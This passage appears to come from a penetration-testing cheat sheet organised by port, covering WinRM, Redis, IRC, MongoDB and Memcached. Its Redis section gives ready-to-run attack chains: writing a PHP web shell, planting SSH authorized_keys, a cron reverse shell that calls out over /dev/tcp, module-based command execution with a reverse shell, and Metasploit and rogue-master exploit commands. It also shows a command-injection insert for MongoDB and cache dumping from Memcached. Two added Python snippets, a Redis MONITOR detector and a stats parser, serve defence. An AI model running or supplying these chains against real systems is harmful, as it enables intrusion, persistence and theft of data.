- Basic over HTTP works only if the host is configured with `Basic=true` and `AllowUnencrypted=true`; if so, flag it as a high-risk misconfiguration. Prefer 5986/TLS.
- WinRM is typically restricted to local Administrators; successful auth is strong lateral-movement evidence.
5986 TCP – WinRM (HTTPS)
- WinRM over TLS; same API as 5985 with transport encryption. Common issues: self-signed/expired certs, CN/SAN mismatch, Basic enabled.
See 5985 TCP – WinRM
6379 TCP – Redis
- In-memory key/value data store.
Attack Paths
Arbitrary File Write (CONFIG + SAVE) → Web shell / SSH key / Cron
- Primitive: `CONFIG SET dir <target_dir>` → `CONFIG SET dbfilename <file>` → `SET …` → `SAVE`.
Web shell (PHP)
| Action | Command |
|---|---|
| Set target directory | `redis-cli -h <ip> CONFIG SET dir <web_root>` |
| Set output filename | `redis-cli -h <ip> CONFIG SET dbfilename shell.php` |
| Write PHP payload to key | `redis-cli -h <ip> SET test "<?php system($_REQUEST['cmd']); ?>"` |
| Persist to disk | `redis-cli -h <ip> SAVE` |
SSH authorized_keys
| Action | Command |
|---|---|
| Stage public key locally | `(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > foo.txt` |
| Upload staged key into Redis | `cat foo.txt \| redis-cli -h <ip> -x SET crackit` |
| Set target directory | `redis-cli -h <ip> CONFIG SET dir <writable_home_dir>` |
| Set output filename | `redis-cli -h <ip> CONFIG SET dbfilename authorized_keys` |
| Persist to disk | `redis-cli -h <ip> SAVE` |
Cron reverse shell
| Action | Command |
|---|---|
| Clear DB (optional) | `redis-cli -h <ip> FLUSHALL` |
| Stage crontab entry key | `echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1\n\n" \| redis-cli -h <ip> -x SET 1` |
| Set target directory | `redis-cli -h <ip> CONFIG SET dir /var/spool/cron/` |
| Set output filename | `redis-cli -h <ip> CONFIG SET dbfilename root` |
| Persist to disk | `redis-cli -h <ip> SAVE` |
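Every variant of the file-write primitive above (web shell, authorized_keys, cron) shows up in `MONITOR` output as a `CONFIG SET dir`/`dbfilename` followed by a `SAVE` from the same client. The following detector is an added example, not part of the original page: it replays constructed MONITOR lines and flags that sequence, with a hypothetical starter list of sensitive directories and filenames.

```python
import posixpath
import re

# Directories and filenames the chains above write into. Hypothetical starter
# list; extend it with your own web roots, cron spools and home directories.
SENSITIVE_DIRS = ("/var/www", "/var/spool/cron", "/etc/cron", "/root/.ssh", "/home")
SENSITIVE_NAMES = ("authorized_keys", "root")

# MONITOR record: [+]<unix ts> [<db> <client addr>] "CMD" "arg" "arg" ...
MONITOR_RE = re.compile(r'^\+?(?P<ts>[\d.]+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<args>.+)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')

# Constructed sample: one client runs the web-shell chain, another does a routine BGSAVE.
SAMPLE_MONITOR = """\
1700000000.100000 [0 10.0.0.5:41234] "CONFIG" "SET" "dir" "/var/www/html"
1700000000.200000 [0 10.0.0.5:41234] "CONFIG" "SET" "dbfilename" "shell.php"
1700000000.300000 [0 10.0.0.5:41234] "SET" "test" "<payload>"
1700000000.400000 [0 10.0.0.5:41234] "SAVE"
1700000001.000000 [0 10.0.0.9:50000] "GET" "session:42"
1700000002.000000 [0 10.0.0.9:50000] "BGSAVE"
""".splitlines()


def analyze_monitor(lines):
    """Return (ts, client, severity, target_path) for each SAVE/BGSAVE that follows a
    CONFIG SET dir/dbfilename by the same client; HIGH when the target looks like a
    web root, cron spool or SSH key file, MEDIUM for any other redirected dump."""
    clients, alerts = {}, []
    for line in lines:
        m = MONITOR_RE.match(line.strip())
        args = ARG_RE.findall(m["args"]) if m else []
        if not args:
            continue  # not a MONITOR record (redis-cli "OK" banner, blank line, ...)
        st = clients.setdefault(m["client"], {"dir": None, "dbfilename": None})
        cmd = args[0].upper()
        if cmd == "CONFIG" and len(args) >= 4 and args[1].upper() == "SET":
            key = args[2].lower()
            if key in st:  # only dir / dbfilename matter for the file-write primitive
                st[key] = args[3]
        elif cmd in ("SAVE", "BGSAVE") and (st["dir"] or st["dbfilename"]):
            directory, name = st["dir"] or "<default dir>", st["dbfilename"] or "dump.rdb"
            hot = directory.startswith(SENSITIVE_DIRS) or name in SENSITIVE_NAMES or name.endswith(".php")
            severity = "HIGH" if hot else "MEDIUM"
            alerts.append((m["ts"], m["client"], severity, posixpath.join(directory, name)))
    return alerts
```

A plain `BGSAVE` without a preceding config change (the second client) is not reported, so scheduled persistence does not raise noise.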
Module-Based RCE
| Action | Command |
|---|---|
| Load module | `redis-cli -h <ip> MODULE LOAD <path_to_module>` |
| Execute command | `redis-cli -h <ip> sys.exec "whoami"` |
| Reverse shell | `redis-cli -h <ip> sys.rev <ip> <port>` |
Rogue Replication → Module-Based RCE (Automated)
| Action | Command |
|---|---|
| Metasploit (unauth) | `msfconsole -q -x "use exploit/linux/redis/redis_unauth_exec; set RHOSTS <ip>; set RPORT 6379; run; exit"` |
| Metasploit (auth) | `msfconsole -q -x "use exploit/linux/redis/redis_replication_cmd_exec; set RHOSTS <ip>; set RPORT 6379; set PASSWORD <password>; run; exit"` |
| Build module (redis-rogue-getshell) | `cd RedisModulesSDK && make` |
| Rogue master → exec cmd | `python3 redis-master.py -r <ip> -p 6379 -L <lhost> -P <lport> -f RedisModulesSDK/exp.so -c "id"` |
redis-cli
| Action | Command |
|---|---|
| Get Redis info / test if authentication is required | `INFO` |
| Login with credentials | `AUTH <password>` <br> `AUTH <username> <password>` |
| Get configuration file contents | `CONFIG GET *` |
| Show connected clients | `CLIENT LIST` |
| Show keys | `KEYS *` |
| Get keys from database | `SELECT <db_number_from_#Keyspace_in_INFO>` <br> `KEYS *` <br> `GET <key>` |
nmap (NSE)
| Action | Command |
|---|---|
| Enumerate server info | `nmap -p 6379 --script redis-info <ip>` |
| Brute-force AUTH | `nmap -p 6379 --script redis-brute <ip>` |
6667 TCP – IRC
- Internet Relay Chat (plaintext).
hexchat
nmap
| Action | Command |
|---|---|
| Enumerate server/version | `nmap -sV -p 6667 --script irc-info <ip>` |
nc
| Action | Command |
|---|---|
| Connect (plaintext) | `nc -v <ip> 6667` |
6697 TCP – IRC (TLS/SSL)
- IRC over TLS/SSL (encrypted).
hexchat
- GUI IRC client; enable SSL/TLS for the server entry.
openssl
| Action | Command |
|---|---|
| TLS connect (test cert/handshake) | `openssl s_client -connect <ip>:6697 -servername <host>` |
nmap
| Action | Command |
|---|---|
| Enumerate server/version | `nmap -sV -p 6697 --script irc-info <ip>` |
27017 TCP – MongoDB
Commands
| Action | Command |
|---|---|
| Connect to DB | `mongo -u <username> -p <password> <database>` |
| Show collections | `show collections` |
| Search for objects in a collection | `db.<collection>.find()` |
| Add object to collection | `db.tasks.insert({"cmd":"<bash command>"})` |
11211 TCP – Memcached
- Caches information for database-backed websites to speed up performance.
nc
| Action | Command |
|---|---|
| Connect | `nc -v <ip> 11211` |
telnet
| Action | Command |
|---|---|
| Connect | `telnet <ip> 11211` |
Commands
| Action | Command |
|---|---|
| Get version | `version` |
| Get status | `stats` |
| Get slabs | `stats slabs` |
| Retrieve items list / slab items info | `stats items` |
| Dump cached items from a slab (0 = unlimited lines) | `stats cachedump <slab_id> 0` |
Tip: `stats items` shows lines like `STAT items:<#>:age ...`; use that `<#>` as `<slab_id>` in `stats cachedump`.
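When auditing what a reachable memcached instance exposes, the two replies above are the ones worth parsing. The following is an added example (not the page's own code) that turns a `stats items` reply into the slab ids, derives the matching `stats cachedump` commands, and parses the `ITEM` lines those return; both replies are constructed samples.

```python
import re

# 'stats items' line: STAT items:<slab_id>:<stat_name> <value>
ITEMS_RE = re.compile(r"^STAT items:(?P<slab>\d+):(?P<stat>\w+) (?P<value>-?\d+)$")
# 'stats cachedump' line: ITEM <key> [<size> b; <expiry> s]
CACHEDUMP_RE = re.compile(r"^ITEM (?P<key>\S+) \[(?P<size>\d+) b; (?P<exp>\d+) s\]$")

# Constructed sample replies (what the server returns, up to its terminating END).
SAMPLE_STATS_ITEMS = """\
STAT items:1:number 2
STAT items:1:age 58
STAT items:1:evicted 0
STAT items:3:number 0
STAT items:3:age 0
STAT items:12:number 1
STAT items:12:age 5
END
"""
SAMPLE_CACHEDUMP = """\
ITEM session:abc123 [48 b; 1700000600 s]
ITEM user:42:email [22 b; 0 s]
END
"""


def parse_stats_items(reply):
    """Map slab_id -> {stat_name: int}; the slab ids are what 'stats cachedump' needs."""
    slabs = {}
    for line in reply.splitlines():
        m = ITEMS_RE.match(line.strip())
        if m:
            slabs.setdefault(int(m["slab"]), {})[m["stat"]] = int(m["value"])
    return slabs


def cachedump_commands(slabs):
    """One 'stats cachedump <slab_id> 0' per slab that currently holds items."""
    return [f"stats cachedump {sid} 0" for sid, st in sorted(slabs.items()) if st.get("number", 0) > 0]


def parse_cachedump(reply):
    """List of (key, size_bytes, expiry) tuples; expiry 0 means the item never expires."""
    return [(m["key"], int(m["size"]), int(m["exp"]))
            for m in map(CACHEDUMP_RE.match, (l.strip() for l in reply.splitlines())) if m]
```

Empty slabs (`number 0`) are skipped, so only slabs that can actually return keys are dumped.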